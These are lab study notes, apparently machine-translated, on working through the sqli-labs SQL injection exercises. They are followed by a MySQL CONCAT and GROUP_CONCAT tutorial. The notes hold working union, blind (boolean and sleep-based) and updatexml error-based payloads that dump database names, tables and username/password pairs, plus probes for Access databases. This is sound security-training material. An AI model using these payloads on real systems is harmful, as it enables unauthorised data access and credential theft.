Safety notes

Check the library ：

select schema_name from information_schema.schemata

Look up the table ：

select table_name from information_schema.tables where table_schema='security'

List ：

select column_name from information_schema.columns where table_name='users'

Check field ：

select username,password from security.users

sqli-lib practice

less-01:
SELECT * FROM users WHERE id='1' LIMIT 0,1;
select SELECT 
limit 0,1;  The first one is from the beginning , such as 0 Represents starting from the first , And the second 1 It represents how many data are displayed .

SELECT * FROM users WHERE id='1' or 1=1-- ' LIMIT 0,1
--+ --  # 
or and 
A and B   True
A or B  True True 
id=1 
SELECT * FROM users WHERE id='1''
less-01
 There are... In the data 3 Column .


system_user()
user()
current_user()
database()
version()
@@datadir
@@version_compile_os

group_concat()
concat_ws('~',A,B)
A~B


information_schema,challenges,mysql,performance_schema,security,test
security
emails,referers,uagents,users
id,username,password


group_concat(concat_ws(0x7e,username,password)) from security.users

concat_ws(0x7e,username,password)    # admin~password,admin1~pass,

'1'
1
('1')

select ascii(substr((select database()),1,1));
select database()   security
select ascii(substr(security),1,1));
select ascii('s')
115

burpsuite  Use ：  agent 
security
crow_1
if length(select database()) =8;

http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema = 0x7365637572697479 limit 1,1),1,1))> 10--+
http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1)) >100--+ 
http://127.0.0.1/sqli/Less-5/?id=1’ and  ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1)) >1000--+ 

ascii(substr((select database()),1,1))> 156
security
 Dichotomy 
1,156
100

http://127.0.0.1/sqli/Less-5/?id=1' 
and 
 ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1)) > 10
 99
 --+ 

select if()
select database()
substr((select database()),1,1)
ascii(substr((select database()),1,1))
select if(ascii(substr((select database()),1,1)) > 10, 2,3);

sqli-labs less01-less10 
mysql  Query statement ：

 Check the library ： select schema_name from information_schema.schemata;
 Look up the table ： select table_name from information_schema.tables where table_schema='security';
 List ： select column_name from information_schema.columns where table_name='users';
 Check field ： select username,password from security.users;

less-11

select 1=1 and 1=2; 
select 1=1 or 1=2;
uname=n'  union select 1, schema_name from information_schema.schemata  limit 1,1#&passwd=admin&submit=Submit
uname=n'  union select 1, group_concat(schema_name) from information_schema.schemata #&passwd=admin&submit=Submit
security
uname=n'  union select 1, group_concat(table_name) from information_schema.tables where table_schema='security' #&passwd=admin&submit=Submit
 summary ：
less-1   get
less-11  post 
(1)

'
')
'))
"
")
"))
select * from users where user_id = '1';
select * from users where user_id = '1111 ' or 1=1 #
select database();
  group_concat(concat(0x7e,username,password)) from security.users
  ~ 
  username~password

less-13
select length(database());
if()
 length ：if(length(database())>1,1,sleep(5));   Database character length is 8
left(database(),1)='a'

uname=ain') or left((select schema_name from information_schema.schemata limit 0,1),1)>'a' #&passwd=admin&submit=Submit  
inf
A-Z
0_9
_


 less-14
 uname=admin " or length(database())='8'#&passwd=admin&submit=Submit  
 A or B 
 A and B 

uname=ain" or left((select schema_name from information_schema.schemata limit 0,1),1)='u' #&passwd=admin&submit=Submit 
uname=adin " or left((select table_name from information_schema.tables where table_schema='security' limit 0,1),1)>'a'#&passwd=admin&submit=Submit  
uname=adin " or left((select column_name from information_schema.columns where table_name='users' limit 0,1),1)='a'#&passwd=admin&submit=Submit  

less-15 
uname=admin&passwd=a' or length(database())='8'#&submit=Submit    

less-16
13   ('ain')
14   "admin"
15    'ain'
16     ("admin") 
uname=admin&passwd=admin") and 1=2#&submit=Submit    

less-17
uname=admin&passwd=afafa'#&submit=Submit
select updatexml(1,concat(0x7e,(database())),1);
select updatexml(1,concat(0x7e,( Construction statement )),1);
 Check the library ： select schema_name from information_schema.schemata;
 Look up the table ： select table_name from information_schema.tables where table_schema='security';
 List ： select column_name from information_schema.columns where table_name='users';
 Check field ： select username,password from security.users;
and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1)),1)
and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security')),1)

less-18
INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('Mn.0', '127.0.0.1', 'admin')
' or updatexml(1,concat(0x7e,()),1);
select  updatexml(1,concat(0x7e,(database())),1);
' or updatexml(1,concat(0x7e,(database())),1) or '1'='1
' or updatexml(1,concat(0x7e,(database())),1), '','')# 
' or updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1)),1), '','')# 
' or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1)),1), '','')# 
' or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 0,1)),1), '','')# 
' or updatexml(1,concat(0x7e,(select username from security.users limit 0,1)),1), '','')# 

16 Base number

0x + Hex Encode	 		

Manual injection

2%'and(select count(*)from mssysaccessobjects)>0 and '%'=' // Return to normal ,access Database 
2%'and(select count(*)from admin_user)>0 and '%'=' // Return to normal , There is admin_user surface 
2%'and(select count(username)from admin_user)>0 and '%'=' // Return to normal , There is username Field 
2%'and(select count(password)from admin_user)>0 and '%'=' // Return to normal , There is password Field 
2%'and(select top 1 len(admin)from admin_user)>4 and '%'=' // Return to normal ,username The length is greater than 4

Mysql in concat()、concat_ws() and group_concat() Usage of

One 、CONCAT（） function

CONCAT（） Function is used to connect multiple strings into one string . Using data tables Info As an example , among SELECT id,name FROM info LIMIT 1; The return result of is

+----+--------+
| id | name  |
+----+--------+
| 1 | BioCyc |
+----+--------+

1、 Grammar and usage characteristics ：

CONCAT(str1,str2,…) The return result is the string generated by the connection parameter . If any parameter is NULL , The return value is NULL. There can be one or more parameters .

2、 Examples of use ：

SELECT CONCAT(id, ‘,’, name) AS con FROM info LIMIT 1; $  The return result is 
+----------+
| con   |
+----------+
| 1,BioCyc |
+----------+

SELECT CONCAT(‘My’, NULL, ‘QL’); #  The return result is 
+--------------------------+
| CONCAT('My', NULL, 'QL') |
+--------------------------+
| NULL           |
+--------------------------+

3、 How to specify the separator between parameters

Using functions CONCAT_WS（）. The syntax is ：CONCAT_WS(separator,str1,str2,…)CONCAT_WS() representative CONCAT With Separator , yes CONCAT() A special form of . The first parameter is the separator for the other parameters . The position of the separator is placed between the two strings to be connected . The separator can be a string , It can also be other parameters . If the separator is NULL, The result is NULL. The function ignores the... After any separator argument NULL value . however CONCAT_WS() No empty strings will be ignored . ( However, we will ignore all of them NULL）.

 Such as SELECT CONCAT_WS('_',id,name) AS con_ws FROM info LIMIT 1; The return result is 
+----------+
| con_ws  |
+----------+
| 1_BioCyc |
+----------+

SELECT CONCAT_WS(',','First name',NULL,'Last Name'); The return result is 
+----------------------------------------------+
| CONCAT_WS(',','First name',NULL,'Last Name') |
+----------------------------------------------+
| First name,Last Name             |
+----------------------------------------------+

Two 、GROUP_CONCAT（） function

GROUP_CONCAT Function returns a string result , The result is a combination of values in the group . Use table info As an example , The sentence

SELECT locus,id,journal FROM info WHERE locus IN('AB086827','AF040764'); The return result of is 
+----------+----+--------------------------+
| locus  | id | journal         |
+----------+----+--------------------------+
| AB086827 | 1 | Unpublished       |
| AB086827 | 2 | Submitted (20-JUN-2002) |
| AF040764 | 23 | Unpublished       |
| AF040764 | 24 | Submitted (31-DEC-1997) |
+----------+----+--------------------------+

1、 Use grammar and features ：

GROUP_CONCAT([DISTINCT] expr [,expr ...]
[ORDER BY {unsigned_integer | col_name | formula} [ASC | DESC] [,col ...]]
[SEPARATOR str_val])

stay MySQL in , You can get the join value of the expression combo . By using DISTINCT You can exclude duplicate values . If you want to sort the values in the results , have access to ORDER BY Clause . SEPARATOR Is a string value , It is used to insert into the result value . The default is a comma (","), You can specify SEPARATOR "" Remove the separator completely . You can go through the variables group_concat_max_len Set a maximum length . The syntax executed at run time is as follows ： SET [SESSION | GLOBAL] group_concat_max_len = unsigned_integer; If the maximum length is set , The resulting value is clipped to this maximum length . If the grouping character is too long , The system parameters can be set ： SET @@global.group_concat_max_len=40000;

2、 Examples of use ：

sentence SELECT locus,GROUP_CONCAT(id) FROM info WHERE locus IN('AB086827','AF040764') GROUP BY locus; The return result of is

+----------+------------------+
| locus  | GROUP_CONCAT(id) |
+----------+------------------+
| AB086827 | 1,2       |
| AF040764 | 23,24      |
+----------+------------------+

sentence SELECT locus,GROUP_CONCAT(distinct id ORDER BY id DESC SEPARATOR '_') FROM info WHERE locus IN('AB086827','AF040764') GROUP BY locus; The return result of is

+----------+----------------------------------------------------------+
| locus  | GROUP_CONCAT(distinct id ORDER BY id DESC SEPARATOR '_') |
+----------+----------------------------------------------------------+
| AB086827 | 2_1                           |
| AF040764 | 24_23                          |
+----------+----------------------------------------------------------+

sentence SELECT locus,GROUP_CONCAT(concat_ws(', ',id,journal) ORDER BY id DESC SEPARATOR '. ') FROM info WHERE locus IN('AB086827','AF040764') GROUP BY locus; The return result of is

+----------+--------------------------------------------------------------------------+
| locus  | GROUP_CONCAT(concat_ws(', ',id,journal) ORDER BY id DESC SEPARATOR '. ') |
+----------+--------------------------------------------------------------------------+
| AB086827 | 2, Submitted (20-JUN-2002). 1, Unpublished                |
| AF040764 | 24, Submitted (31-DEC-1997) . 23, Unpublished              |
+----------+--------------------------------------------------------------------------